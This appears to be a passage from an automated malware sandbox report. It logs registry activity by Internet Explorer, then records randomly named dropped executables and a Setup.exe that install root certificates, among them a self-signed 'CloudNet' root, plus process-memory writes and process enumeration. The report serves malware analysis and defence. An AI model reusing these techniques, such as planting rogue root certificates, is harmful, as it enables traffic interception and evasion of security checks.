Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{64E60BC1-6CBE-11EE-AF5C-C6D3BD361474} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{652FBEF1-6CBE-11EE-AF5C-C6D3BD361474} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{654801E1-6CBE-11EE-AF5C-C6D3BD361474} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\785B0CD2BDDEE7CBA2C272AC3EC9DCBC8835C3C4\Blob = 0f0000000100000020000000ffda0203811f8b2cca225df80e814442949df70618555e614bb267a89cc9e71b030000000100000014000000785b0cd2bddee7cba2c272ac3ec9dcbc8835c3c42000000001000000f9020000308202f5308201dda003020102021028cac2390d446838dc905f237a8b07ad300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3233303932383139303030305a170d3238303932363139303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100bc57e9b9584988333103e4819b955a2ef7494ac3af4912d07d59b529387c748691bb827c637ff9950773840ee2728a7a8987c127952251ac749c97a683710b536aa845d6f6cf82384efcd239ae294ca0dc6e54de02af89d408562d41c95fdf24f60033856f5d8312254243f80618eb55ae31612f8a4e9d61acfeb3476316afe4ce20a3629d3ef8fdf8c01c66eca11f1e36b9d5fbebfaa1d07068367e1138249b220779db32ab6b2959517493bd5c7a0f2f94eb1f3e170ef2df4d2aea496d49c12b272df7f10419a9b8c9522553134b3d8ca0b5a2e5366d3c40bdd85d56425329ab85694a7e04e4e8a413d8bc44009e90011c45b8cdc380dcdd55885e13ff3ec10203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e041604143c14b0c4f79ee701ce7a068006a734b505c19e88300d06092a864886f70d01010b0500038201010015e6471828cc1ad1330221f32e5d6d2f9e51edb41cb38e1f9a52d26af2a229342cd18b8a3f23e7c26a546276ffd1d09ae010447dc52d62a7e3f879b2f8e1b9df10c5695b7e4c47172142f599df8ae70ef357d1b1e9eba9d385a1f5eae798b035e0e8fbd753c9c43e3c232e935f4de301f46a2b1aece9eca64686b46ea7e69f8e538e0a5e5b759e4c9eafdae6ba2f57aa66eff15b28323e30e67cfd145c60c2940bd927247dc5a5c09954901f8215cb530909fc8c4c60b03daae8e23d62dcd80beae9eaf18dea862c7d000b86eda4dc7b2197aa53bdc96c0c37f5c90e1b07d343cc468887683123d95a054e1174ea018a61d88865d66c833702722508d7d5a02d C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\785B0CD2BDDEE7CBA2C272AC3EC9DCBC8835C3C4\Blob = 190000000100000010000000aad8adf39bae31f746c3facd72799f830f0000000100000020000000ffda0203811f8b2cca225df80e814442949df70618555e614bb267a89cc9e71b030000000100000014000000785b0cd2bddee7cba2c272ac3ec9dcbc8835c3c41400000001000000140000003c14b0c4f79ee701ce7a068006a734b505c19e882000000001000000f9020000308202f5308201dda003020102021028cac2390d446838dc905f237a8b07ad300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3233303932383139303030305a170d3238303932363139303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100bc57e9b9584988333103e4819b955a2ef7494ac3af4912d07d59b529387c748691bb827c637ff9950773840ee2728a7a8987c127952251ac749c97a683710b536aa845d6f6cf82384efcd239ae294ca0dc6e54de02af89d408562d41c95fdf24f60033856f5d8312254243f80618eb55ae31612f8a4e9d61acfeb3476316afe4ce20a3629d3ef8fdf8c01c66eca11f1e36b9d5fbebfaa1d07068367e1138249b220779db32ab6b2959517493bd5c7a0f2f94eb1f3e170ef2df4d2aea496d49c12b272df7f10419a9b8c9522553134b3d8ca0b5a2e5366d3c40bdd85d56425329ab85694a7e04e4e8a413d8bc44009e90011c45b8cdc380dcdd55885e13ff3ec10203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e041604143c14b0c4f79ee701ce7a068006a734b505c19e88300d06092a864886f70d01010b0500038201010015e6471828cc1ad1330221f32e5d6d2f9e51edb41cb38e1f9a52d26af2a229342cd18b8a3f23e7c26a546276ffd1d09ae010447dc52d62a7e3f879b2f8e1b9df10c5695b7e4c47172142f599df8ae70ef357d1b1e9eba9d385a1f5eae798b035e0e8fbd753c9c43e3c232e935f4de301f46a2b1aece9eca64686b46ea7e69f8e538e0a5e5b759e4c9eafdae6ba2f57aa66eff15b28323e30e67cfd145c60c2940bd927247dc5a5c09954901f8215cb530909fc8c4c60b03daae8e23d62dcd80beae9eaf18dea862c7d000b86eda4dc7b2197aa53bdc96c0c37f5c90e1b07d343cc468887683123d95a054e1174ea018a61d88865d66c833702722508d7d5a02d C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\785B0CD2BDDEE7CBA2C272AC3EC9DCBC8835C3C4 C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\785B0CD2BDDEE7CBA2C272AC3EC9DCBC8835C3C4\Blob = 1400000001000000140000003c14b0c4f79ee701ce7a068006a734b505c19e88030000000100000014000000785b0cd2bddee7cba2c272ac3ec9dcbc8835c3c40f0000000100000020000000ffda0203811f8b2cca225df80e814442949df70618555e614bb267a89cc9e71b2000000001000000f9020000308202f5308201dda003020102021028cac2390d446838dc905f237a8b07ad300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3233303932383139303030305a170d3238303932363139303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100bc57e9b9584988333103e4819b955a2ef7494ac3af4912d07d59b529387c748691bb827c637ff9950773840ee2728a7a8987c127952251ac749c97a683710b536aa845d6f6cf82384efcd239ae294ca0dc6e54de02af89d408562d41c95fdf24f60033856f5d8312254243f80618eb55ae31612f8a4e9d61acfeb3476316afe4ce20a3629d3ef8fdf8c01c66eca11f1e36b9d5fbebfaa1d07068367e1138249b220779db32ab6b2959517493bd5c7a0f2f94eb1f3e170ef2df4d2aea496d49c12b272df7f10419a9b8c9522553134b3d8ca0b5a2e5366d3c40bdd85d56425329ab85694a7e04e4e8a413d8bc44009e90011c45b8cdc380dcdd55885e13ff3ec10203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e041604143c14b0c4f79ee701ce7a068006a734b505c19e88300d06092a864886f70d01010b0500038201010015e6471828cc1ad1330221f32e5d6d2f9e51edb41cb38e1f9a52d26af2a229342cd18b8a3f23e7c26a546276ffd1d09ae010447dc52d62a7e3f879b2f8e1b9df10c5695b7e4c47172142f599df8ae70ef357d1b1e9eba9d385a1f5eae798b035e0e8fbd753c9c43e3c232e935f4de301f46a2b1aece9eca64686b46ea7e69f8e538e0a5e5b759e4c9eafdae6ba2f57aa66eff15b28323e30e67cfd145c60c2940bd927247dc5a5c09954901f8215cb530909fc8c4c60b03daae8e23d62dcd80beae9eaf18dea862c7d000b86eda4dc7b2197aa53bdc96c0c37f5c90e1b07d343cc468887683123d95a054e1174ea018a61d88865d66c833702722508d7d5a02d C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
